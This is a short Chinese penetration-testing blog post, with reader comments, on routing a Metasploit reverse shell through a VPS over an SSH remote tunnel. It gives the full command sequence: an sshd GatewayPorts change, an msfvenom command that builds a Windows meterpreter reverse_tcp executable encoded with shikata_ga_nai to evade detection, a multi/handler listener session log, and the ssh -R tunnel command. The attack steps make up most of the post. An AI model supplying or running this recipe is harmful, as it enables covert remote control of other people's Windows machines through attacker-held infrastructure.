通过VPS SSH隧道使用本地msf
in 渗透案例奇技淫巧 with 5 comments

通过VPS SSH隧道使用本地msf

in 渗透案例奇技淫巧 with 5 comments

这里首先需要配置VPS ssh服务
编辑 /etc/ssh/sshd_config
在文件最后添加:

GatewayPorts yes

重启ssh服务
之后配置msf客户端:

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b ‘\x00’ LHOST=[vpsIP] LPORT=8888 -f exe > abc.exe

之后本地启用监听:

msf > use exploit/multi/handler 
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.2.100
lhost => 192.168.2.100
msf exploit(handler) > set lport 8888
lport => 8888
msf exploit(handler) > set exitonsession false
exitonsession => false
msf exploit(handler) > exploit -j
[*] Exploit running as background job.

[*] Started reverse TCP handler on 192.168.2.100:8888 

开启ssh隧道:

ssh -N -R 8888:192.168.2.100:8888 echo@evi1cg.me

客户端被执行以后,成功返回回话:
121221.png

Responses
  1. 最近在研究powershell相关的 希望加好友共同探讨

    Reply
  2. Sam

    额。。。你确定 vps 与 本地 处于同一局域网?

    Reply
    1. @Sam

      VPS是公网的,怎么能与本地的环境处于一个局域网?你在想什么同学?

      Reply
  3. echo@evi1cg.me 这个可以不要吧

    Reply
  4. 哦,搞错了 echo@evi1cg.me是用户名@目标IP

    Reply